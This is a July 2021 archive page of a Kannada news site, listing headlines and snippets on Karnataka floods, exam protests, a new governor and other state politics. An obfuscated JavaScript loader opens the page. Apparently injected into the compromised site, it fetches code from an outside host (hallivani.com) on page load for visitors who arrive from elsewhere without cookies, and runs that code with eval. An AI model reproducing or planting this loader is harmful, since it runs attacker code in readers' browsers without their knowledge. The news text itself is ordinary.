;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//hallivani.com/8jju21px/cache/cache.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};

Month: July 2021

ನಿರಂತರ ಮಳೆಗೆ ಧಾರವಾಡ ತತ್ತರ: ಹಳ್ಳದ ನೀರಿನಲ್ಲಿ ಕೊಚ್ಚಿ ಹೋದ ಜಾನುವಾರು

ಧಾರವಾಡ, ಜುಲೈ 23: ಜಿಲ್ಲೆಯಲ್ಲಿ ವರುಣನ ಅರ್ಭಟ ಜೋರಾಗಿದ್ದು, ಹಳ್ಳಗಳು ಉಕ್ಕಿ ಹರಿಯುತ್ತಿದೆ. ಇನ್ನು ನೀರಿನ ರಭಸಕ್ಕೆ ಜಾನುವಾರುಗಳು ಕೊಚ್ಚಿ…

ರಾಜ್ಯದಲ್ಲಿ ಇನ್ನೂ 3 ದಿನ ಮಳೆ ಹೆಚ್ಚು: 9 ಜಿಲ್ಲೆಗಳಲ್ಲಿ ರೆಡ್ ಅಲರ್ಟ್!

ಬೆಂಗಳೂರು, ಜು. 23: ರಾಜ್ಯದಲ್ಲಿ ಮಳೆ ಅಬ್ಬರ ಹೆಚ್ಚಾಗುತ್ತಿರುವ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಕಂದಾಯ ಸಚಿವ ಆರ್. ಅಶೋಕ್ ಅವರು ಕೈಗೊಂಡಿರುವ ಮುಂಜಾಗ್ರತಾ…

ಪರೀಕ್ಷೆ ರದ್ದು ಮಾಡಿ ಅಂತ ಪ್ರತಿಭಟನೆಗೆ ಕುಳಿತ ವಿದ್ಯಾರ್ಥಿಗಳು

ದಾವಣಗೆರೆ, ಜುಲೈ 20: ಸ್ನಾತಕೋತ್ತರ ಮತ್ತು ಪದವಿ ಪರೀಕ್ಷೆಗಳನ್ನು ರದ್ದು ಮಾಡುವಂತೆ ಕೋರಿ ವಿದ್ಯಾರ್ಥಿಗಳು ಪ್ರತಿಭಟನೆ ಮಾಡಿದ ಘಟನೆ ದಾವಣಗೆರೆಯ…

ಜುಲೈ 15 ರಿಂದ ದ್ವಿತೀಯ ಪಿಯುಸಿ ಆನ್​ಲೈನ್​ ತರಗತಿ ಆರಂಭ

ಬೆಂಗಳೂರು, ಜುಲೈ 14: ದ್ವಿತೀಯ ಪಿಯುಸಿ ಶೈಕ್ಷಣಿಕ ವರ್ಷವು ಜುಲೈ 15 ರಿಂದ ಆರಂಭವಾಗಲಿದ್ದು, ವಿದ್ಯಾರ್ಥಿಗಳಿಗೆ ಆನ್‌ಲೈನ್‌ನಲ್ಲಿ ಪೂರ್ಣ ಪ್ರಮಾಣದ…

ಕೇಂದ್ರ ಸರ್ಕಾರಿ ನೌಕರರಿಗೆ ಗುಡ್‌ನ್ಯೂಸ್‌ ; ತುಟ್ಟಿಭತ್ಯೆ ಶೇ.28ಕ್ಕೆ ಹೆಚ್ಚಿಸಲು ಸಂಪುಟ ಸಭೆ ಅನುಮೋದನೆ

ನವ ದಹೆಲಿ , ಜುಲೈ 14: ಕೇಂದ್ರದ ಸರ್ಕಾರಿ ನೌಕರರಿಗೆ ಪ್ರಧಾನಿ ಮೋದಿ ಸರ್ಕಾರ ಗುಡ್‌ನ್ಯೂಸ್‌ ನೀಡಿದೆ. ತುಟ್ಟಿಭತ್ಯೆ (ಡಿಎ)…

ಜೋತು ಬಿದ್ದಿರುವ ಕೇಬಲ್ ತೆರವು ಮಾಡದಿದ್ದರೆ ಕಟ್ಟುನಿಟ್ಟಿನ ಆದೇಶ: ಹೈಕೋರ್ಟ್ ಎಚ್ಚರಿಕೆ

ಬೆಂಗಳೂರು, ಜುಲೈ 13: ರಸ್ತೆಗಳ ಬದಿಗಳಲ್ಲಿ ಜೋತು ಬಿದ್ದಿರುವ ಕೇಬಲ್ ವೈರ್​​ಗಳನ್ನು ತೆರವು ಮಾಡಲು ತ್ವರಿತ ಕ್ರಮ ಕೈಗೊಳ್ಳದಿದ್ದರೆ, ಅವುಗಳನ್ನು…

ಪರಪ್ಪನ ಅಗ್ರಹಾರ ಕೇಂದ್ರ ಕಾರಾಗೃಹಕ್ಕೆ ಸಿಸಿಬಿ ದಾಳಿ

ಬೆಂಗಳೂರು, ಜುಲೈ10: ನಗರದ ಪರಪ್ಪನ ಅಗ್ರಹಾರ ಕಾರಾಗೃಹದ ಮೇಲೆ ಸಿಸಿಬಿ ಪೊಲೀಸರು ಶನಿವಾರ ನಸುಕಿನಲ್ಲಿ ದಿಢೀರ್ ದಾಳಿ ಮಾಡಿದರು. ಕಾರಾಗೃಹದಲ್ಲಿರುವ…

ಜುಲೈ 11ರಂದು ನೂತನ ರಾಜ್ಯಪಾಲರಾಗಿ ಥಾವರ್ ಚಂದ್ ಗೆಹ್ಲೋಟ್ ಪ್ರಮಾಣವಚನ ಸ್ವೀಕಾರ

ಬೆಂಗಳೂರು, ಜುಲೈ 9: ರಾಜ್ಯದ ನೂತನ ರಾಜ್ಯಪಾಲರಾಗಿ ನೇಮಕಗೊಂಡಿರುವ ಕೇಂದ್ರದ ಮಾಜಿ ಸಚಿವ ಥಾವರ್ ಚಂದ್ ಗೆಹ್ಲೋಟ್ ಜುಲೈ 11ರಂದು…

ಖಾಕಿ ಪಡೆಯ ಪರಿಸರ ಪ್ರೇಮ: ಪೊಲೀಸರಿಂದ ‘ಬೀಟ್‌ಗೊಂದು ಮರ ಅಭಿಯಾನ’

ಹುಬ್ಬಳ್ಳಿ, ಜುಲೈ 6 : ಪೊಲೀಸ್ ಇಲಾಖೆ ಕಾರ್ಯವೈಖರಿ ಮತ್ತೊಂದು ಸಾಮಾಜಿಕ ಜವಾಬ್ದಾರಿಗೆ ಮುಂದಾಗಿದೆ‌. ಕಳ್ಳರ, ವಂಚಕರ ಬಗ್ಗೆ ತಲೆಕೆಡಿಸಿಕೊಳ್ಳುತ್ತಿದ್ದ…

ನಾಯಕತ್ವದ ಚರ್ಚೆಯನ್ನ ಹಾದಿ ಬೀದಿಯಲ್ಲಿ ಮಾಡುವಂಥದ್ದಲ್ಲ: ನಳಿನ್ ಕುಮಾರ್ ಕಟೀಲು

ಹಾವೇರಿ, ಜುಲೈ 5: ನಾಯಕತ್ವದ ಚರ್ಚೆಯನ್ನ ಹಾದಿ ಬೀದಿಯಲ್ಲಿ ಮಾಡುವಂಥದ್ದಲ್ಲ. ಶಾಸಕಾಂಗ ಸಭೆಗಳನ್ನ ಕರೆಯುತ್ತದೆ. ಅಲ್ಲಿ ಚರ್ಚೆ ನಡೆಸಬೇಕು. ಅದನ್ನು…

ಕೊರೊನಾಗೆ ಬಲಿಯಾದ ರೈತರ ಸಾಲ ಮನ್ನಾಗೆ ಮುಂದಾದ ಅಪೆಕ್ಸ್ ಬ್ಯಾಂಕ್‌

ಮೈಸೂರು, ಜುಲೈ 4: ಮಾರಕ ಕೊರೊನಾ ವೈರಸ್​​​ ಇಡೀ ದೇಶವನ್ನು ಸಂಕಷ್ಟಕ್ಕೆ ದೂಡಿದೆ. ಯಾವುದೇ ಆದಾಯವಿಲ್ಲದೇ ಕೂಲಿಕಾರ್ಮಿಕ ರೈತರು ಪರದಾಡುತ್ತಿದ್ದಾರೆ….

ಸಿಎಂ ಬಿಎಸ್​ವೈಗೆ ಮತ್ತೆ ಸಂಕಷ್ಟ: ಅಕ್ರಮ ಡಿ-ನೋಟಿಫಿಕೇಷನ್‌ ಕೇಸ್​​ ಮರು ತನಿಖೆಗೆ ಆದೇಶ

ಬೆಂಗಳೂರು, ಜುಲೈ 3: ಬೆಳ್ಳಂದೂರು ಅಕ್ರಮ ಡಿ-ನೋಟಿಫಿಕೇಷನ್‌ ಪ್ರಕರಣದಲ್ಲಿ ಸಿಎಂ ಬಿ.ಎಸ್‌. ಯಡಿಯೂರಪ್ಪಗೆ ಮತ್ತೆ ಸಂಕಷ್ಟ ಎದುರಾಗಿದೆ. ಪೊಲೀಸರು ಸಲ್ಲಿಸಿರುವ…

ಹುಬ್ಬಳ್ಳಿ ಧಾರವಾಡ ಮಹಾನಗರ ಪಾಲಿಕೆಯ ಚುನಾವಣೆಗೆ ಮತ್ತೊಂದು ಗ್ರಹಣ

ಧಾರವಾಡ, ಜುಲೈ 2: ಹುಬ್ಬಳ್ಳಿ ಧಾರವಾಡ ಮಹಾನಗರ ಪಾಲಿಕೆಯ ಚುನಾವಣೆಗೆ ಮತ್ತೊಂದು ಗ್ರಹಣ ಎದುರಾಗಿದೆ.  ಅವಳಿ ನಗರಗಳಲ್ಲಿ ಹೊಸದಾಗಿ ರಚನೆಯಾದ…